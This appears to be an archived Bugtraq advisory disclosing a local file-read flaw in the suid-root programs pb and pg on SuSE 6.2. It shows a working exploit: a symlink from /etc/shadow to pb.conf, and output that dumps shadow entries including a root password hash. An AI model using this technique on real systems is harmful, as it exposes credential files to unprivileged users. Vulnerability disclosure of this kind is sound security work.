home *** CD-ROM | disk | FTP | other *** search
- Subject: Two SuSE 6.2 local root exploits
- To: BUGTRAQ@SECURITYFOCUS.COM
-
-
- Greetings,
-
-
- /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
- any user to read any file on the system as shown:
-
-
- susebox:/root # ls -la /usr/bin/pb
- uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
-
-
- susebox:/root # strace /usr/bin/pb
- ...
- personality(PER_LINUX) = 0
- getpid() = 16623
- brk(0) = 0x805032c
- brk(0x80504cc) = 0x80504cc
- brk(0x8051000) = 0x8051000
- open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
- directory)
- write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
- file or directory
- ) = 41
- _exit(1) = ?
- susebox:/root #
-
-
- ---
- xnec@susebox:/tmp > id
- uid=1001(xnec) gid=100(users) groups=100(users)
- xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
- xnec@susebox:/tmp > pb
- Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =
- <bin:*:8902:0:10000::::>
- Unknown config line : <daemon:*:8902:0:10000::::> =
- <lp:*:9473:0:10000::::>
- Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
- Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
- ... etc for the entire shadow file
-
-
- The same scenario for /usr/bin/pg's pg.conf in your cwd. These two
- programs also contain numerous buffer overflows and other insecure file
- i/o and should obviously lose their suid bits. They cannot operate
- correctly without their s-bits unless they are run by root, but no one
- besides root will run them anyway. These programs are not worth
- patching.
-
-
- Brock Tellier
- UNIX Systems Administrator
- Webley Systems
- www.webley.com
-
-
-
